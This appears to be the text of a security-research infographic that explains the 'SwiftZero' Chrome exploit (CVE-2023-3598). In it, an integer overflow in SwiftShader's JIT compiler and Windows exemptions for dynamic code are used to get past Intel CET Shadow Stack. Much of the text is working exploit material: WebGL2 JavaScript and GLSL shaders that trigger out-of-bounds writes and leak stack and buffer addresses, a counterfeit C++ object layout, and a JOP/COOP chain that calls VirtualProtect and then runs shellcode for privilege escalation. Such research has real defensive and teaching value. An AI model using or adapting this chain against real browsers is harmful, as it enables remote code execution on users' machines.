An infographic detailing the CVE-2023-3598 "SwiftZero" Chrome sandbox escape which bypasses Intel CET Shadow Stack on Windows x64.
Intel's Control-flow Enforcement Technology (CET) is a hardware-level defense. Its key feature for this talk is the Shadow Stack, a CPU-protected stack that creates a secure record of return addresses to prevent backward-edge control flow attacks.
On every function return, the CPU compares the return address on the normal stack with the one on the Shadow Stack. If they mismatch, it triggers a hardware fault, terminating the process. This is designed to make return-oriented programming (ROP) attacks impossible.
void foo() { ... }
void main() {
foo(); // <-- CALL
// <-- return addr is here
}
The call instruction pushes the return address to both stacks simultaneously.
#CP Fault: Process Terminated
CPU detects mismatch during RET instruction and triggers a hardware fault.
pop rcx
ret
A typical gadget found in legitimate code.
MISMATCH: #CP Fault on ret
mov rcx, [rbx]
jmp rcx ; <-- VirtualProtect
A gadget to perform an action and jump.
↓
↓
Shadow Stack still expects the original return address.
↓
MISMATCH: #CP Fault on ret
; COP gadget found in real code
mov rdx, [rax+0x20] ; Load VirtualProtect addr
call rdx ; Call VirtualProtect - SUCCESS!
mov rbx, [rax+0x30] ; ← VirtualProtect returns HERE
add rsp, 0x28 ; Unwanted stack manipulation
pop r14 ; Destroys register state
Real gadgets have problematic instructions that destroy control flow.
↓
Shadow Stack: must return to line 4
↓
↓
Stack manipulation destroys control
↓
↓
Control flow completely lost
COP can call one function, but can't skip the destructive instructions that follow.
The initial specification is released to give the software ecosystem time to prepare.
Intel releases 11th Gen "Tiger Lake" CPUs with CET. Microsoft enables "Hardware-enforced Stack Protection" in Windows 10 (20H1).
Google starts enabling CET support for Chrome 90.
Microsoft introduces Kernel-mode Hardware-enforced Stack Protection in Windows 11 (22H2).
CET's deployment was a multi-year collaboration between hardware, OS, and application vendors.
Windows doesn't just turn CET on. It uses a flexible system called "Hardware-enforced Stack Protection" (HSP) system. This compatibility mode introduces specific rules that an attacker can potentially exploit.
CPU detects mismatch
KiControlProtectionFault
ALLOW
Legitimate return
ALLOW
JIT/interpreted code exemption
ALLOW
Legacy compatibility
TERMINATE
CET violation detected
TERMINATE
CET violation detected
The kernel's compatibility exemptions for non-CETCOMPAT dynamic code (like JIT-compiled shaders) create a bypass opportunity. SwiftShader's JIT code is exempt from CET enforcement, allowing our exploit to work.
The vulnerability (CVE-2023-3598) lies within SwiftShader's JIT compiler. A 32-bit integer overflow when calculating stack space for large shader variables leads to a classic stack-based buffer overflow.
Learn morevoid Cfg::sortAndCombineAllocas(CfgVector<InstAlloca *> &Allocas,
uint32_t CombinedAlignment, InstList &Insts,
AllocaBaseVariableType BaseVariableType) {
if (Allocas.empty())
return;
...
uint32_t CurrentOffset = 0; // 32-bit integer can overflow!
CfgVector<int32_t> Offsets;
// The vulnerable loop:
for (Inst *Instr : Allocas) {
auto *Alloca = llvm::cast<InstAlloca>(Instr);
uint32_t Alignment = std::max(Alloca->getAlignInBytes(), 1u);
auto *ConstSize =
llvm::dyn_cast<ConstantInteger32>(Alloca->getSizeInBytes());
// Size can be controlled by attacker via shader code
uint32_t Size = Utils::applyAlignment(ConstSize->getValue(), Alignment);
...
Offsets.push_back(...);
CurrentOffset += Size; // INTEGER OVERFLOW HERE!
}
// Round the offset up to the alignment to determine the final allocation size
uint32_t TotalSize = Utils::applyAlignment(CurrentOffset, CombinedAlignment);
...
}
Line 7: CurrentOffset is a 32-bit unsigned integer that can overflow
Line 17: Size can be controlled by attacker via shader code
Line 21: Integer overflow occurs here when CurrentOffset wraps around
Lines 25: The overflowed value leads to an undersized allocation
You can craft shader variables large enough to cause CurrentOffset
to wrap around, resulting in an undersized stack frame allocation.
(() => {
// Create a temporary canvas to get a WebGL2 context
const canvas = document.createElement('canvas');
const gl = canvas.getContext('webgl2');
if (!gl) {
console.error("WebGL 2 is not available on your browser.");
return;
}
// A simple, valid vertex shader
const vsSource = `
#version 300 es
mat4 buf[0xffffff]; // Trigger the overflow in sortAndCombineAllocas
void main() {
buf[1][2][3]=uintBitsToFloat(0x41414141);
}`;
// --- The Compilation Process ---
const shader = gl.createShader(gl.VERTEX_SHADER);
gl.shaderSource(shader, vsSource);
gl.compileShader(shader);
// --- Check the Result ---
if (gl.getShaderParameter(shader, gl.COMPILE_STATUS)) {
console.log("Shader compiled successfully!");
} else {
console.error("Shader compilation failed:");
console.error(gl.getShaderInfoLog(shader));
}
})();
Client-Side Shader Compilation via WebGL2 using JavaScript
Line 14: Large array triggers integer overflow
#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xffffff];
void main() {
// These writes go out of bounds
buf[1][2][3]=uintBitsToFloat(0x41414141);
}
Line 4: Large array triggers integer overflow
Line 7: Out-of-bounds write overwrites return address
Reading past array bounds exposes sensitive stack data like the return addresses.
#version 300 es
// Trigger integer overflow in sortAndCombineAllocas
mat4 buf[0xfffffff];
flat out uint returnAddr;
void main() {
// These reads go out of bounds
returnAddr = floatBitsToUint(buf[1][2][3]);
}
Line 4: Large array triggers integer overflow
Line 8: Out-of-bounds read leaks return address
Reading past array bounds exposes sensitive stack data like the return addresses.
#version 300 es
mat4 buf[0xffffff];
flat out uint value;
layout(std140) uniform Buffer {
uint value[0x100];
} buffer;
uint extra[0x10];
void main() {
// Read and write operations to
// avoid compiler optimizations
buf[0][0][0] = uintBitsToFloat(buffer.value[0x1]);
extra[0] = floatBitsToUint(buf[0][0][0]);
buf[0][0][1] = uintBitsToFloat(extra[0]);
// Leak the address of the Uniform Buffer Object
value = floatBitsToUint(buf[0][2][2]);
}
Line 3: Large array triggers integer overflow
Line 13-15: Forces allocation of GlUniformBufferObject
Line 17: Leaks address of the Uniform Buffer Object
The shader forces allocation of a GlUniformBufferObject and leaks its address for precise memory layout control.
So what can we do?
We need a technique that:
COOP: A code reuse attack targeting C++ applications, introduced by Felix Schuster in 2015.
Read the paperclass SimpleTimer {
uint64_t deadline;
bool active;
public:
void Stop() { active = false; } // Direct call
void Run() { /* execute */ } // Direct call
};
SimpleTimer* timer = new SimpleTimer();
timer->Stop(); // Direct function call
Lines 5-6: Regular functions use direct calls
No vtable pointer - just data members
class Timer {
void* vtable_ptr; // Hidden, compiler-added
uint64_t deadline;
public:
virtual void Stop() { ... } // Indirect call
virtual void Run() { ... } // Indirect call
};
Timer* timer = new Timer();
timer->Run(); // Virtual call through vtable
Lines 5-6: Virtual functions require vtable lookup
Hidden vtable pointer added as first member
Regular Function Call
call SimpleTimer::Stop ; Direct call to known address
Virtual Function Call
mov rax, [rcx] ; Load vtable pointer
call [rax+0x8] ; Indirect call through vtable
Virtual functions enable polymorphism but introduce indirection that COOP exploits
1. Control Object Layout
Attacker creates fake objects with controlled vtable pointers
2. Hijack Virtual Calls
Virtual function calls become attacker-controlled indirect calls
; timer->Stop() becomes:
mov rax, [rcx] ; Load fake vtable
call [rax+0x00] ; Calls VirtualProtect!
; timer->Run() becomes:
call [rax+0x08] ; Executes shellcode!
3. Chain Functions
Chain existing functions together to achieve arbitrary behavior
// Original code path:
timer->Stop(); // 1. VirtualProtect
timer->Run(); // 2. Shellcode
// Result: Memory made executable,
// then shellcode runs
COOP bypasses CFI by using legitimate virtual call sites with counterfeit objects.
1. Make Memory Executable (GlUniformBufferObject)
First virtual call must be redirectable to VirtualProtect
2. Execute Our Code
Second virtual call must call our shellcode
void DeadlineTimer::OnScheduledTaskInvoked() {
DCHECK_CALLED_ON_VALID_SEQUENCE(sequence_checker_);
DCHECK(!delayed_task_handle_.IsValid());
// Make a local copy of the task to run. The Stop method will reset the
// |user_task_| member.
OnceClosure task = std::move(user_task_);
Stop(); // Virtual call #1 - Perfect for VirtualProtect
std::move(task).Run(); // Virtual call #2 - Perfect for shellcode execution
}
Line 8: First virtual call - we'll hijack this to call VirtualProtect
Line 9: Second virtual call - we'll hijack this to execute our shellcode
Two sequential virtual calls with controlled object = perfect COOP gadget
View the full source code on Chromium; DeadlineTimer::OnScheduledTaskInvoked()
; RCX = `this` pointer
; (points to our FakeDeadlineTimer object)
push rsi
sub rsp, 20
; --- Part 1: Move the task object (std::move(user_task_)) ---
mov rax, [rcx] ; Load vtable pointer from our fake object
mov rsi, [rcx+0x48] ; Load 'user_task_' pointer (points to our payload)
mov [rcx+0x48], 0 ; Zero out the pointer
; --- Part 2: Call Stop() -> Hijacked to call VirtualProtect ---
mov rax, [rax+0x10] ; Load function pointer from fake vtable offset 0x10
; We placed &VirtualProtect here
call __guard_dispatch_icall_fptr
; CFG allows this - VirtualProtect is a valid target!
; Makes our shellcode executable
; --- Part 3: Call Run() -> Hijacked to execute shellcode ---
mov rax, [rsi+8] ; Load &Payload from our counterfeit object
mov rcx, rsi ; Set 'this' pointer for the call
call __guard_dispatch_icall_fptr ; Executes our shellcode
; --- Cleanup ---
test rsi, rsi
jne chrome.0x7~
add rsp, 0x20
pop rsi
ret
Line 8: Loads our controlled vtable pointer
Line 9: Loads user_task_ which points to our payload
Line 13: Loads VirtualProtect from our fake vtable
Line 13: Calls VirtualProtect
Line 20: Loads &Shellcode from our fake vtable
Line 23: Second hijacked call - calls our shellcode
Counterfeit object in GlUniformBuffer
Stop() → VirtualProtect
Run() → Shellcode
The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.
VirtualProtect requires specific arguments in Windows x64 calling convention:
BOOL VirtualProtect(
RCX: LPVOID lpAddress, // Our fake object
RDX: SIZE_T dwSize, // Size to protect
R8: DWORD flNewProtect, // PAGE_EXECUTE_READWRITE
R9: PDWORD lpflOldProtect // Output buffer
);
pop rdx ; Pop value for dwSize (0x1000)
pop r8 ; Pop value for flNewProtect (0x40 = PAGE_EXECUTE_READWRITE)
pop r9 ; Pop value for lpflOldProtect (writable address)
pop rcx ; Pop pointer to our FakeDeadlineTimerObject
pop rax ; Pop address of DeadlineTimer::OnScheduledTaskInvoked
jmp rax ; Jump to our COOP gadget
Lines 1-4: Set up all arguments for VirtualProtect
Line 6: Transfer control to our COOP gadget
Stack is prepared with all arguments before jumping to JOP gadget
With control over the instruction pointer but facing modern defenses, the exploit uses a multi-stage process to achieve code execution.
Stage 1: First, We Craft Our Fake Object
Using our bug primitives, we allocate a glUniform buffer and craft a counterfeit `DeadlineTimer` object inside it. We control its entire layout.
Counterfeit object in GlUniformBuffer
Stop() → VirtualProtect
Run() → Shellcode
The object's user_task_ member (offset 0x48) points to offset 0x50, creating a self-referential structure that satisfies the COOP gadget's requirements.
Stage 2: Stack Setup & Initial Control
Before triggering the final return, we use the bug's primitives to prepare the stack
Stage 3: CET Bypass
The kernel's compatibility logic checks the return. Since the shader is non-CETCOMPAT dynamic code, the return is ALLOWED.
Shadow Stack is bypassed. RIP now points to our JOP chain.
Stage 4: Argument Engineering
A "call-less" JOP chain executes, loading registers with arguments for `VirtualProtect` and placing a pointer to our Counterfeit Object into `RCX`.
pop rdx ; Pop value for dwSize
pop r8 ; Pop value for flNewProtect
pop r9 ; Pop value for lpflOldProtect
pop rcx ; Pop pointer to our FakeDeadlineTimerObject
pop rax ; Pop address for the next jump target
jmp rax ; Jump to DeadlineTimer::OnScheduledTaskInvoked
This perfect gadget sets all arguments for VirtualProtect then jumps to our target function.
Stage 5: Counterfeit Object Execution
void DeadlineTimer::OnScheduledTaskInvoked() {
// Move our user_task_ obj
OnceClosure task = std::move(user_task_);
// &VirtualProtect
Stop();
// &Shellcode
std::move(task).Run();
}
Line 3: Stop() hijacked to call VirtualProtect
Line 4: Run() hijacked to execute shellcode
Stage 6: LPE
The shellcode will trigger LPE and will be downloaded and executed by the GPU process.